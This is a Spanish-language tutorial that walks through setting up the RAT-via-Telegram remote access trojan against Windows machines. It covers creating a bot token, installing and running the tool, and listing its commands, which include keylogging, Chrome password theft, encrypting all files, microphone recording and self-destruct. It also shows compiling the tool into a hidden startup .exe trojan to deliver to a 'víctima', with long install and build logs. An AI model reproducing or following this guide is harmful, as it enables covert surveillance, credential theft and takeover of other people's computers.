CÓMO USAR TELEGRAM PARA HACKEAR Y CONTROLAR UNA MÁQUINA WINDOWS 10

Hoy en día, casi todos en Internet con los que hablas son bots, incluso las consultas en aplicaciones web son operadas por bots. Un bot es un tipo de herramienta operada por comandos en lugar de un usuario. Muchas compañías están usando bots para varias tareas, como proporcionar soporte de chat en línea a sus clientes; Cuando accede a un sitio web de soporte, puede aparecer un cuadro de chat que le pregunta “Hola, ¿en qué puedo ayudarlo?”, este es un ejemplo de bot. El bot interactuará con el usuario, brindándole algunas respuestas automáticas para resolver un problema.

Así es como funciona un bot, pero ¿qué pasa con los hackers? ¿Podrían aprovechar estas herramientas? En este artículo discutiremos cómo Telegram puede usarse para hackear una computadora y puede usarse como bots.

Hay muchas herramientas de administración remota (RAT) disponibles en el mercado, pero comparten dos problemas comunes:

  • Si toma el control de un dispositivo a través de algún troyano o malware a cientos de millas de distancia, para realizar algunas tareas en esa máquina infectada, necesitará configurar un servidor de Comando y Control, enviando así los comandos necesarios a la víctima dispositivo
  • Como las comunicaciones entre la máquina de la víctima y el servidor de C&C no están encriptadas, la comunicación con el hacker es insegura

Para superar estos problemas, algunos investigadores usan bots de Telegram como herramienta de administración remota, resolviendo estos inconvenientes.

  • Para controlar el equipo de la víctima no se requiere reenviar ningún puerto ni alojar ningún servidor, ya que estos robots de Telegram resuelven este problema. La API de Bot de Telegram conecta la computadora de la víctima con el servidor de Telegram a través del cual el hacker puede comunicarse fácilmente con la víctima
  • Toda la comunicación está cifrada a través del protocolo HTTPS y ayuda a prevenir cualquier ataque Man-In-The-Middle
  • Lo mejor es que el atacante puede usar la versión móvil de Telegram móvil para controlar la máquina víctima o el bot

Así que vamos a sumergirnos en la herramienta y ver cómo funciona.

ESPECIFICACIONES DEL ENTORNO

  • Recomendamos estrictamente el uso de Python 3.7. Versiones anteriores y posteriores no son compatibles
  • Sistema operativo: Windows 7, 8 y 10 (recomendado). No se admite ningún otro sistema operativo
  • Solo se admite la arquitectura de Windows de 64 bits
  • Asegúrese de tener una buena conexión a internet

PASOS PARA LA INSTALACIÓN

Crear su propio Telegram bot:

  • Para crear un Telegram Bot, descargue la aplicación oficial de Telegram a través de Google Play
  • Después de la descarga, navegue a la barra de búsqueda de la aplicación Telegram y escriba BotFather
  • Después de abrir la ventana de BotFather, haga clic en Inicio y escriba /newbot
  • Luego deberá elegir un nombre para su bot. En este ejemplo usaremos el nombre test123
  • Ahora le pedirá que elija un nombre de usuario para su bot, en el ejemplo usaremos el nombre rsu890_bot
  • Después de realizar estos pasos, se le asignará un token de identificación (presentado como “xx: xx”). Copie este token y guárdelo en un lugar protegido, ya que será necesario para configurar el bot
Copy this token ID

INSTALACIÓN Y USO DE BOTFATHER

  • Clone el siguiente repositorio: https://github.com/mvrozanti/RAT-via-Telegram.git
  • Descomprima la carpeta descargada y abra RATAttack.py con el bloc de notas con la carpeta dada
  • Ahora presione Ctrl + F y busque “token”
  • Ahora pegue el token en la dirección obtenida, es decir, token = ‘xx: xx’ token = ‘YOUR_TOKEN_ID’
  • Presione Buscar siguiente y reemplace RVT_TOKEN ’por‘ YOUR_TOKEN_ID ’y token = os.environ [‘ RVT_TOKEN ’] token = os.environ [‘ YOUR_TOKEN_ID ’] y guarde el archivo
  • Ahora descargue las dos bibliotecas de Python desde el siguiente enlace: https://www.lfd.uci.edu/~gohlke/pythonlibs/
  • Descargue pyHook 1.5.1 cp37 cp37m win_amd64.whl y pyHook 1.5.1 cp37 cp37m win_amd64.whl
  • Después de descargar las dos bibliotecas anteriores, instálelas abriendo el símbolo del sistema y escribiendo los comandos

pip installpyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl y pip install pyHook‑1.5.1‑cp37‑cp37m‑win_amd64.whl

  • Después de descargar las dos bibliotecas anteriores, copie la ruta del repositorio descargado, abra el símbolo del sistema y escriba cd <path_of_repository>
  • Ahora escriba el comando pip -r require.txt
C:\Users\webimprints\rsu>cd C:\Users\webimprints\rsu\RAT-via-Telegram-master
C:\Users\webimprints\rsu\RAT-via-Telegram-master>pip install -r requirements.txt
Requirement already satisfied: telepot in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 1)) (12.7)Requirement already satisfied: requests in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 2)) (2.23.0)
Requirement already satisfied: image in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 3)) (1.5.28)
Requirement already satisfied: winshell in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 4)) (0.6)
Requirement already satisfied: tendo in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 5)) (0.2.15)
Requirement already satisfied: pypiwin32 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: pyinstaller in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 7)) (3.6)
Requirement already satisfied: psutil in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 8)) (5.7.0)
Requirement already satisfied: pillow in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 9)) (7.1.1)
Requirement already satisfied: opencv-python in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 10)) (4.2.0.34)
Requirement already satisfied: console-tools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 11)) (0.2.1)
Requirement already satisfied: urllib3>=1.9.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (1.25.8)
Requirement already satisfied: aiohttp>=3.0.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (3.6.2)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2020.4.5.1)
Requirement already satisfied: chardet<4,>=3.0.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (3.0.4)
Requirement already satisfied: idna<3,>=2.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2.9)
Requirement already satisfied: django in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from image->-r requirements.txt (line 3)) (3.0.5)
Requirement already satisfied: six>=1.7.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (1.14.0)
Requirement already satisfied: pbr in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (5.4.4)
Requirement already satisfied: setuptools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (40.8.0)
Requirement already satisfied: pip in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (20.0.2)
Requirement already satisfied: pywin32>=223 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pypiwin32->-r requirements.txt (line 6)) (227)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (2019.4.18)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.2.0)
Requirement already satisfied: altgraph in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.17)
Requirement already satisfied: numpy>=1.14.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from opencv-python->-r requirements.txt (line 10)) (1.18.2)
Requirement already satisfied: termcolor in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (1.1.0)
Requirement already satisfied: colorama in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (0.4.3)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (1.4.2)
Requirement already satisfied: multidict<5.0,>=4.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (4.7.5)
Requirement already satisfied: async-timeout<4.0,>=3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (3.0.1)
Requirement already satisfied: attrs>=17.3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (19.3.0)
Requirement already satisfied: sqlparse>=0.2.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (0.3.1)
Requirement already satisfied: asgiref~=3.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (3.2.7)
Requirement already satisfied: pytz in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (2019.3)
Requirement already satisfied: future in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 7)) (0.18.2)
  • Ahora que su herramienta está lista, puede usarla escribiendo el comando python RATAttack.py
  • Ahora puede abrir Telegram en su teléfono móvil y buscar su nombre de usuario bot, por ejemplo rsu890_bot, y escribir el comando en el chatbox /help

A continuación aparecerán los siguientes comandos:

arp - display arp table
capture_pc - screenshot PC
cmd_exec - execute shell command
cp - copy files
cd - change current directory
delete - delete a file/folder
download - download file from target
decode_all - decode ALL encoded local files
dns - display DNS Cache
encode_all - encode ALL local files
freeze_keyboard - enable keyboard freeze
unfreeze_keyboard - disable keyboard freeze
get_chrome - Get Google Chrome's login/passwords
hear - record microphone
ip_info - via ipinfo.io
keylogs - get keylogs
ls - list contents of current or specified directory
msg_box - display message box with text
mv - move files
pc_info - PC information
ping - makes sure target is up
play - plays a youtube video
proxy - opens a proxy server
pwd - show current directory
python_exec - interpret python
reboot - reboot computer
run - run a file
schedule - schedule a command to run at specific time
self_destruct - destroy all traces
shutdown - shutdown computer
tasklist - display services and processes running
to - select targets by it's name
update - update executable
wallpaper - change wallpaper

Ahora emplearemos la herramienta en la máquina objetivo.

  • Busque el bot requerido en la aplicación de Telegram y escriba /pc_info para obtener la información sobre la máquina de la víctima
  • Puede ver y modificar el archivo de Windows de los sistemas de la víctima escribiendo el comando /cd C:\Windows\system32
  • Puede ver los registros DNS de la máquina de la víctima escribiendo /dns
 see the DNS records of the victim’s machine
  • Si desea que la máquina objetivo solo se comunique con usted, reemplace el CHAT_ID en RATAttack.py como:
  • Del mismo modo, puede reproducir un video de YouTube usando el comando /play<VIDEO_ID>
  • Puede apagar o reiniciar la computadora de la víctima /shutdown o /restart respectivamente
  • Puede hacer muchas más tareas leyendo el manual en /help

USAR LA HERRAMEINTA COMO UN TROYANO

Podemos usar esta herramienta como un troyano. Como todos sabemos, la forma más fácil de enviar malware a la computadora de alguien es empacar el malware en .exe y enviarlo a la víctima. Haremos lo mismo creando un .exe que siempre se ejecutará en el inicio. Para crear el archivo .exe, siga estos pasos:

  • Abra compile.py con el bloc de notas en la carpeta descargada
  • Comente la declaración download_and _install_lfd_uci_wheel (‘pyAudio’) y download_and _install_lfd_uci_wheel (‘pyHook’) a #download_and _install_lfd_uci_wheel (‘pyAudio’) y #download_and _install_lfd respectivamente
  • Ahora abra nuevamente la terminal y muévase a la carpeta RATAttack escribiendo el comando cd <path_of_RATAttack>
  • Ahora ejecute el comando python compile.py para ejecutar y compilar el archivo .exe
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>python compile.py
Now going to install dependencies and compile the rat, make sure you have prepped RATAttack.py beforehand
Press ENTER to resumeRequirement already satisfied: telepot in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 1)) (12.7)
Requirement already satisfied: requests in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 2)) (2.23.0)
Requirement already satisfied: image in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 3)) (1.5.28)
Requirement already satisfied: winshell in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 4)) (0.6)
Requirement already satisfied: tendo in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 5)) (0.2.15)
Requirement already satisfied: pypiwin32 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: pyinstaller in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 7)) (3.6)
Requirement already satisfied: psutil in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 8)) (5.7.0)
Requirement already satisfied: pillow in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 9)) (7.1.1)
Requirement already satisfied: opencv-python in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 10)) (4.2.0.34)
Requirement already satisfied: console-tools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from -r requirements.txt (line 11)) (0.2.1)
Requirement already satisfied: urllib3>=1.9.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (1.25.8)
Requirement already satisfied: aiohttp>=3.0.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from telepot->-r requirements.txt (line 1)) (3.6.2)
Requirement already satisfied: idna<3,>=2.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2.9)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (2020.4.5.1)
Requirement already satisfied: chardet<4,>=3.0.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from requests->-r requirements.txt (line 2)) (3.0.4)
Requirement already satisfied: django in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from image->-r requirements.txt (line 3)) (3.0.5)
Requirement already satisfied: setuptools in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (40.8.0)
Requirement already satisfied: pbr in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (5.4.4)
Requirement already satisfied: pip in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (20.0.2)
Requirement already satisfied: six>=1.7.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from tendo->-r requirements.txt (line 5)) (1.14.0)
Requirement already satisfied: pywin32>=223 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pypiwin32->-r requirements.txt (line 6)) (227)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.2.0)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (2019.4.18)
Requirement already satisfied: altgraph in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pyinstaller->-r requirements.txt (line 7)) (0.17)
Requirement already satisfied: numpy>=1.14.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from opencv-python->-r requirements.txt (line 10)) (1.18.2)
Requirement already satisfied: termcolor in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (1.1.0)
Requirement already satisfied: colorama in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from console-tools->-r requirements.txt (line 11)) (0.4.3)
Requirement already satisfied: attrs>=17.3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (19.3.0)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (1.4.2)
Requirement already satisfied: async-timeout<4.0,>=3.0 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (3.0.1)
Requirement already satisfied: multidict<5.0,>=4.5 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from aiohttp>=3.0.0->telepot->-r requirements.txt (line 1)) (4.7.5)
Requirement already satisfied: pytz in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (2019.3)
Requirement already satisfied: asgiref~=3.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (3.2.7)
Requirement already satisfied: sqlparse>=0.2.2 in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from django->image->-r requirements.txt (line 3)) (0.3.1)
Requirement already satisfied: future in c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 7)) (0.18.2)
'upx' is not recognized as an internal or external command,
operable program or batch file.
Did the install run correctly?
Press ENTER to build
139 INFO: PyInstaller: 3.6
143 INFO: Python: 3.7.4
143 INFO: Platform: Windows-10-10.0.18362-SP0
143 INFO: wrote C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.spec
146 INFO: UPX is not available.
146 INFO: Removing temporary files and cleaning cache in C:\Users\webimprints\rsu\AppData\Roaming\pyinstaller
178 INFO: Extending PYTHONPATH with paths
['C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master',
'C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master']
182 INFO: checking Analysis
182 INFO: Building Analysis because Analysis-00.toc is non existent
182 INFO: Initializing module dependency graph…
189 INFO: Caching module graph hooks…
209 INFO: Analyzing base_library.zip …
8635 INFO: Caching module dependency graph…
8807 INFO: running Analysis Analysis-00.toc
8823 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
required by c:\users\webimprints\rsu\appdata\local\programs\python\python37\python.exe
8965 INFO: Analyzing C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\RATAttack.py
11708 INFO: Processing pre-find module path hook distutils
11708 INFO: distutils: retargeting to non-venv dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib'
14101 INFO: Processing pre-find module path hook site
14105 INFO: site: retargeting to fake-dir 'c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\fake-modules'
17175 INFO: Processing pre-safe import module hook setuptools.extern.six.moves
24228 INFO: Processing pre-safe import module hook win32com
26225 INFO: Processing pre-safe import module hook urllib3.packages.six.moves
29213 INFO: Processing module hooks…
29213 INFO: Loading module hook "hook-certifi.py"…
29213 INFO: Loading module hook "hook-cv2.py"…
29213 INFO: Loading module hook "hook-distutils.py"…
29228 INFO: Loading module hook "hook-encodings.py"…
29369 INFO: Loading module hook "hook-lib2to3.py"…
29384 INFO: Loading module hook "hook-numpy.core.py"…
29900 INFO: Loading module hook "hook-numpy.py"…
29900 INFO: Loading module hook "hook-PIL.Image.py"…
31044 INFO: Loading module hook "hook-PIL.py"…
31047 INFO: Import to be excluded not found: 'FixTk'
31051 INFO: Import to be excluded not found: 'PyQt4'
31051 INFO: Import to be excluded not found: 'PySide'
31051 INFO: Excluding import 'PyQt5'
31055 INFO: Removing import of PyQt5 from module PIL.ImageQt
31059 INFO: Excluding import 'tkinter'
31063 INFO: Removing import of tkinter from module PIL.ImageTk
31067 INFO: Loading module hook "hook-PIL.SpiderImagePlugin.py"…
31071 INFO: Import to be excluded not found: 'FixTk'
31074 INFO: Excluding import 'tkinter'
31083 INFO: Loading module hook "hook-pkg_resources.py"…
32079 INFO: Excluding import 'main'
32083 INFO: Removing import of main from module pkg_resources
32083 INFO: Loading module hook "hook-pydoc.py"…
32086 INFO: Loading module hook "hook-pythoncom.py"…
32454 INFO: Loading module hook "hook-pywintypes.py"…
32817 INFO: Loading module hook "hook-setuptools.py"…
33720 INFO: Loading module hook "hook-sqlite3.py"…
33861 INFO: Loading module hook "hook-sysconfig.py"…
33861 INFO: Loading module hook "hook-win32com.py"…
34049 INFO: Loading module hook "hook-xml.dom.domreg.py"…
34049 INFO: Loading module hook "hook-xml.etree.cElementTree.py"…
34049 INFO: Loading module hook "hook-xml.py"…
34049 INFO: Loading module hook "hook-_tkinter.py"…
34377 INFO: checking Tree
34377 INFO: Building Tree because Tree-00.toc is non existent
34377 INFO: Building Tree Tree-00.toc
34517 INFO: checking Tree
34517 INFO: Building Tree because Tree-01.toc is non existent
34517 INFO: Building Tree Tree-01.toc
34673 INFO: Looking for ctypes DLLs
34829 INFO: Analyzing run-time hooks …
34845 INFO: Including run-time hook 'pyi_rth_pkgres.py'
34845 INFO: Including run-time hook 'pyi_rth_win32comgenpy.py'
34861 INFO: Including run-time hook 'pyi_rth_multiprocessing.py'
34877 INFO: Including run-time hook 'pyi_rth_certifi.py'
34907 INFO: Looking for dynamic libraries
37430 INFO: Looking for eggs
37430 INFO: Using Python library c:\users\webimprints\rsu\appdata\local\programs\python\python37\python37.dll
37445 INFO: Found binding redirects:
[]
37461 INFO: Warnings written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\warn-RATAttack.txt
37804 INFO: Graph cross-reference written to C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\xref-RATAttack.html
37867 INFO: checking PYZ
37867 INFO: Building PYZ because PYZ-00.toc is non existent
37867 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz
40633 INFO: Building PYZ (ZlibArchive) C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\build\RATAttack\PYZ-00.pyz completed successfully.
40712 INFO: checking PKG
40712 INFO: Building PKG because PKG-00.toc is non existent
40712 INFO: Building PKG (CArchive) PKG-00.pkg
60100 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
441806 INFO: Bootloader c:\users\webimprints\rsu\appdata\local\programs\python\python37\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
441806 INFO: checking EXE
441822 INFO: Building EXE because EXE-00.toc is non existent
441837 INFO: Building EXE from EXE-00.toc
441837 INFO: Appending archive to EXE C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master\dist\RATAttack.exe
442041 INFO: Building EXE from EXE-00.toc completed successfully.
Script has finished
C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master>cd C:\Users\webimprints\rsu\Desktop\RAT-via-Telegram-master
  • Como puede ver, esa compilación es exitosa, por lo que ahora su archivo .exe está compilado y puede ver este archivo yendo a \dist y ejecutando este archivo de la misma manera que ejecutó la herramienta en los pasos anteriores
  • Si tiene acceso a la computadora de la víctima por un tiempo, puede ocultar este archivo .exe y mantenerlo ejecutándose en segundo plano o puede vincular este archivo .exe y hacer algunas secuencias de comandos para ocultarlo en la computadora de la víctima

CONCLUSIÓN

Toda la herramienta está escrita en python, lo que proporciona muchas funciones. El concepto detrás de esta herramienta es mucho mejor que cualquier otro ataque de malware y ayuda al atacante a comunicarse fácilmente con el sistema de la víctima con menos conocimiento técnico requerido.